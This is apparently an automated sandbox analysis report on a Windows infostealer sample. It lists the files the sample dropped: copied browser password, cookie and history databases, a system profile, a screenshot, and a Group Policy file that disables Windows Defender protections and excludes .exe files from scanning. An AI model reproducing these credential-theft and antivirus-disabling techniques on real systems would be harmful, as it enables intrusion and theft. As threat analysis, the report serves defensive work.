SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanuHHVgZK6_r3s\LrsRpbnZnzPmLogin Data For Account

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanuHHVgZK6_r3s\Q1KT8XwnyB_aWeb Data

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanuHHVgZK6_r3s\Z7Yuxtpi7pUyWeb Data

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanuHHVgZK6_r3s\ZriO6tn8Siv1History

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanuHHVgZK6_r3s\dL2vJQuu7EoHHistory

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanuHHVgZK6_r3s\j_f7766d2puYHistory

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanuHHVgZK6_r3s\lsqPckitCOdaHistory

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanuHHVgZK6_r3s\m5Mie8xKwOWILogin Data

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanuHHVgZK6_r3s\sbsB1tmQEFYiLogin Data

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\trixyuHHVgZK6_r3s\Browsers\Chrome\Default\Cookies.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	ASCII text, with very long lines (769), with CRLF line terminators
Category:	dropped
Size (bytes):	6085
Entropy (8bit):	6.038274200863744
Encrypted:	false
SSDEEP:	96:gxsumX/xKO2KbcRfbZJ5Jxjxcx1xcbza5BC126oxgxA26Fxr/CxbTxqCGYURxOeb:gWFXZQHRFJ5Pts7c3avC126Ygb6Lr/WY
MD5:	ACB5AD34236C58F9F7D219FB628E3B58
SHA1:	02E39404CA22F1368C46A7B8398F5F6001DB8F5C
SHA-256:	05E5013B848C2E619226F9E7A084DC7DCD1B3D68EE45108F552DB113D21B49D1
SHA-512:	5895F39765BA3CEDFD47D57203FD7E716347CD79277EDDCDC83A729A86E2E59F03F0E7B6B0D0E7C7A383755001EDACC82171052BE801E015E6BF7E6B9595767F
Malicious:	false
Preview:	.google.com.TRUE./.TRUE.1712145003.NID.ENC893_djEw3+k+F2A/rK1XOX2BXUq6pY2LBCOzoXODiJnrrvDbDsPWiYwKZowg9PxHqkTm37HpwC52rXpnuUFrQMpV3iKtdSHegOm+XguZZ6tGaCY2hGVyR8JgIqQma1WLXyhCiWqjou7/c3qSeaKyNoUKHa4TULX4ZnNNtXFoCuZcBAAy4tYcz+0BF4j/0Pg+MgV+s7367kYcjO4q3zwc+XorjSs7PlgWlYrcc55rCJplhJ+H13M00HIdLm+1t9PACck2xxSWX2DsA61sEDJCHEc=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=..support.microsoft.com.FALSE./.TRUE.1696413835..AspNetCore.AuthProvider.ENC893_djEwVWJCCNyFkY3ZM/58ZZ/F/bz9H1yPvi6FOaroXC+KU8E=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=..support.microsoft.com.TRUE./signin-oidc.TRUE.1696414135..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.ENC893_djEwBAKLrkJs5PZ6BD7Beoa9N/bOSh5JtRch10gZT+E=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=..support.microsoft.com.TRUE./signin-oidc.TRUE.1696414135..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkH

C:\Users\user\AppData\Local\Temp\trixyuHHVgZK6_r3s\Browsers\Firefox\fqs92o4p.default-release\History.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	112
Entropy (8bit):	4.911305722693245
Encrypted:	false
SSDEEP:	3:N8DSLvIJiMgTE2WdkQUl7R8DSLvIJiMhKVX3L2WdkQUlv:2OLciodq7R8OLciA8dqv
MD5:	978B9515D3688A43726604AC169DF379
SHA1:	D61293AB99332FC45CAE37D78AB17A5DA5BCD189
SHA-256:	CDEF3FB1CE312E4B67DC5F1B1F9FB551241C08564FDB26AFA4CBF448BB02EA65
SHA-512:	86146AA576129B73743B1EBC0BC60880FDA58A11498048B3C68284C4520F1ADC324D016696B0E995A51AC56966E0F38B0AF12458A986868701C6AAAA89C829CB
Malicious:	false
Preview:	https://www.mozilla.org/privacy/firefox/.1696333827..https://www.mozilla.org/en-US/privacy/firefox/.1696333827..

C:\Users\user\AppData\Local\Temp\trixyuHHVgZK6_r3s\Cookies\Chrome_Default.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	ASCII text, with very long lines (769), with CRLF line terminators
Category:	dropped
Size (bytes):	6085
Entropy (8bit):	6.038274200863744
Encrypted:	false
SSDEEP:	96:gxsumX/xKO2KbcRfbZJ5Jxjxcx1xcbza5BC126oxgxA26Fxr/CxbTxqCGYURxOeb:gWFXZQHRFJ5Pts7c3avC126Ygb6Lr/WY
MD5:	ACB5AD34236C58F9F7D219FB628E3B58
SHA1:	02E39404CA22F1368C46A7B8398F5F6001DB8F5C
SHA-256:	05E5013B848C2E619226F9E7A084DC7DCD1B3D68EE45108F552DB113D21B49D1
SHA-512:	5895F39765BA3CEDFD47D57203FD7E716347CD79277EDDCDC83A729A86E2E59F03F0E7B6B0D0E7C7A383755001EDACC82171052BE801E015E6BF7E6B9595767F
Malicious:	false
Preview:	.google.com.TRUE./.TRUE.1712145003.NID.ENC893_djEw3+k+F2A/rK1XOX2BXUq6pY2LBCOzoXODiJnrrvDbDsPWiYwKZowg9PxHqkTm37HpwC52rXpnuUFrQMpV3iKtdSHegOm+XguZZ6tGaCY2hGVyR8JgIqQma1WLXyhCiWqjou7/c3qSeaKyNoUKHa4TULX4ZnNNtXFoCuZcBAAy4tYcz+0BF4j/0Pg+MgV+s7367kYcjO4q3zwc+XorjSs7PlgWlYrcc55rCJplhJ+H13M00HIdLm+1t9PACck2xxSWX2DsA61sEDJCHEc=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=..support.microsoft.com.FALSE./.TRUE.1696413835..AspNetCore.AuthProvider.ENC893_djEwVWJCCNyFkY3ZM/58ZZ/F/bz9H1yPvi6FOaroXC+KU8E=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=..support.microsoft.com.TRUE./signin-oidc.TRUE.1696414135..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.ENC893_djEwBAKLrkJs5PZ6BD7Beoa9N/bOSh5JtRch10gZT+E=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=..support.microsoft.com.TRUE./signin-oidc.TRUE.1696414135..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkH

C:\Users\user\AppData\Local\Temp\trixyuHHVgZK6_r3s\information.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	5631
Entropy (8bit):	5.334706214246517
Encrypted:	false
SSDEEP:	48:xSuCiA6JoRRF7qJdac/RIHGBX3F1ByoS7ss3WhksiaZhfU9UnN/3vVnltop1BkdI:xSZ/goRRNDcT4Aisph892N/3vANUbg3x
MD5:	86DD8850B1CBB24E8087065967D6AA90
SHA1:	1F5987428596C80F7EBE20CA59B20954F5B0982C
SHA-256:	1B2A719A1DE29C3F90940E1257A659256EAAEF116DE8F55D1A9C90D3C731F036
SHA-512:	1192859ED59CDDF0515A36AAF1BFF6C3D08D504CACA351AF7B8FAE1A82CF87E3B1CD70904EBD784A1409777881104D76CE1E5DD4EE4E74FD6CC533A6A707856D
Malicious:	false
Preview:	Build: kzYTB..Version: 2.0....Date: Fri Jun 28 13:53:20 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: 8ac91c54bc1edd16ad07d857478b6084....Path: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif..Work Dir: C:\Users\user\AppData\Local\Temp\trixyuHHVgZK6_r3s....IP: 8.46.123.33..Location: US, New York..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 192799 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 28/6/2024 13:53:20..TimeZone: UTC-5....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [324]..csrss.exe [408]..wininit.exe [484]..csrss.exe [492]..winlogon.exe [552]..services.exe [620]..lsass.exe [628]..svchost.exe [752]..fontdrvhost.exe [776]..font

C:\Users\user\AppData\Local\Temp\trixyuHHVgZK6_r3s\passwords.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	Unicode text, UTF-8 text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	4897
Entropy (8bit):	2.518316437186352
Encrypted:	false
SSDEEP:	48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
MD5:	B3E9D0E1B8207AA74CB8812BAAF52EAE
SHA1:	A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
SHA-256:	4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
SHA-512:	B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\trixyuHHVgZK6_r3s\screenshot.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	699630
Entropy (8bit):	7.924636627063592
Encrypted:	false
SSDEEP:	12288:e6fkyBMhY5HF06ug0BazbMbtWuyl66su/JgGmiYKfr71AXauLEf1OzLtd6uNH//f:5cymY5l0hhQ/KGmIfPf1O90SHd9
MD5:	A28B4BC98044E3D5D3CC2A0213D9E70C
SHA1:	AAA2F2FB7D7A805801A454DCC33178ED60EAA736
SHA-256:	501F2D68824CBD42AC5DF69CEB319B9BE21374B15A0A2DD952CA2A52C19A273D
SHA-512:	C3F96A3B7C15AC93E095E049CEF8F4BE3E14CDBB65C3238D73F6752A86540A69A62CE36A7C68BE18F0B1763094DC0E8E013AFF2CE7F33109AF9A4C872DD33184
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.eWy...}.....q...}..v.._....vh...9G$A.D.....B..@..H".8.............H0...~...<..g.svUI....s..s..Na....z.S~....Cxl.y....?.u....?i...l..%.L.3..;1...G.Q\|32S...5M6.....?.H.}...}......'.G..?Y.3.....M.G....?0.3..F.?6.;..c.N....e..G.....6.#...../.....Y$...(f>p...}wM....9.3....hz.c.{.H3.}..w.6..w..~....{..eo..c.m.L.[o^...lh..X.ya....,.....4.1..,..yC.[.....c..F.....r;...d.kbf^...W5....[...........?.......2c..gy....^q..\|..>.^v]Z.....u7.a../......r.....bE...........\?......e.4,?4.3+^..ja.y....3._..V.....W.e/..@_....s+....V.\|uZ.sP......\.f..2...".....\|I....X.O..k...+..<...~o.K...ey..>...c3.z.5.a..W....}[./.'..}Y...]l...U..}s.siW.............+....f..8...N.cX._.Vn{{\|.......}.u3.......2..+.....+.\|...y.=.S`....G...3...........=..l...u...]......4..J..n.~3..;^....}X.k.....XK.j.f.<.s^.[....v.(-.1_7..)O.g..[.[~.9...{...._X.z.]Pb...

C:\Windows\SysWOW64\GroupPolicy\gpt.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	11
Entropy (8bit):	3.2776134368191165
Encrypted:	false
SSDEEP:	3:1EX:10
MD5:	EC3584F3DB838942EC3669DB02DC908E
SHA1:	8DCEB96874D5C6425EBB81BFEE587244C89416DA
SHA-256:	77C7C10B4C860D5DDF4E057E713383E61E9F21BCF0EC4CFBBC16193F2E28F340
SHA-512:	35253883BB627A49918E7415A6BA6B765C86B516504D03A1F4FD05F80902F352A7A40E2A67A6D1B99A14B9B79DAB82F3AC7A67C512CCF6701256C13D0096855E
Malicious:	false
Preview:	[General]..

C:\Windows\System32\GroupPolicy\GPT.INI

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	127
Entropy (8bit):	5.080093624462795
Encrypted:	false
SSDEEP:	3:1ELGUAgKLMzY+eWgTckbnnvjiBIFVTjSUgf4orFLsUov:1WsMzYHxbnvEcvgqv
MD5:	8EF9853D1881C5FE4D681BFB31282A01
SHA1:	A05609065520E4B4E553784C566430AD9736F19F
SHA-256:	9228F13D82C3DC96B957769F6081E5BAC53CFFCA4FFDE0BA1E102D9968F184A2
SHA-512:	5DDEE931A08CFEA5BB9D1C36355D47155A24D617C2A11D08364FFC54E593064011DEE4FEA8AC5B67029CAB515D3071F0BA0422BB76AF492A3115272BA8FEB005
Malicious:	true
Preview:	[General]..gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}]..Version=1..

C:\Windows\System32\GroupPolicy\Machine\Registry.pol

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	RAGE Package Format (RPF),
Category:	dropped
Size (bytes):	1926
Entropy (8bit):	3.310422749310586
Encrypted:	false
SSDEEP:	24:wSLevFeSLe5BeSwbv5qweSw4q7j/eScdepWDbVeScden2W8eScdemevtmeScdeRg:KFIBkbv5qwk4qfKV2QxVCZ
MD5:	CDFD60E717A44C2349B553E011958B85
SHA1:	431136102A6FB52A00E416964D4C27089155F73B
SHA-256:	0EE08DA4DA3E4133E1809099FC646468E7156644C9A772F704B80E338015211F
SHA-512:	DFEA0D0B3779059E64088EA9A13CD6B076D76C64DB99FA82E6612386CAE5CDA94A790318207470045EF51F0A410B400726BA28CB6ECB6972F081C532E558D6A8
Malicious:	false
Preview:	PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.A.n.t.i.S.p.y.w.a.r.e...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.R.o.u.t.i.n.e.l.y.T.a.k.i.n.g.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s...;.E.x.c.l.u.s.i.o.n.s._.E.x.t.e.n.s.i.o.n.s...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s.\.E.x.t.e.n.s.i.o.n.s...;.e.x.e...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.R.e.a.l.-.T.i.m.e. .P.r.o.t.e.c.t.i.o.n...;.D.i.s.a.b.l.e.B.e.h.a.v.i.o.r.M.o.n.i.t.o.r.i.n.g...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.R.e.a.l.-.T.i.m.e. .P.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.993980810080819
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	External24.exe
File size:	2'479'935 bytes
MD5:	e8af10713a9e8ee414a1a0865c2379f2
SHA1:	12193121a75325ca4a32e7260d82e6d8c85fe0d4
SHA256:	acad873da34aab461e8a7b87dd2c6d98c3b2b187f5ca868415bac26af1516da5
SHA512:	3fb65941ec7a0a979ad055dc62f240b8de4e6e2d7b5566e97eec43d695bf77653e6ea4882abeae55e9558d2e0b734985e58b712823b4ba20fb10ad8377fa833a
SSDEEP:	49152:PMa2yfLmOYmaAkjwyI36HznuE1djDUGNywFVf8o0pBsBZOJ:PFctk36jxDU+LVEoQsOJ
TLSH:	0FB533025EA81038F48A4EF031F1DF0B10FCF8768D2B9967B666C992B33C656F59C616
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8.....

File Icon


Icon Hash:	cbceccb2e0c1f072

Static PE Info

General

Entrypoint:	0x4038af
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	09/03/2023 00:00:00 11/03/2025 23:59:59
Subject Chain	CN="Oracle America, Inc.", O="Oracle America, Inc.", L=Redwood City, S=California, C=US
Version:	3
Thumbprint MD5:	5F429788727974C52EF1B4CD93D03B8F
Thumbprint SHA-1:	CD7BE0F00F2A5EE102C3037E098AF3F457D3B1AB
Thumbprint SHA-256:	4B59D847D7187ED910590D52798FD7E6FCB13396092FDBC1FE43B2311AAB6EEB
Serial:	060E2F8F9E1B8BE518D5FE2B69CFCCB1

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
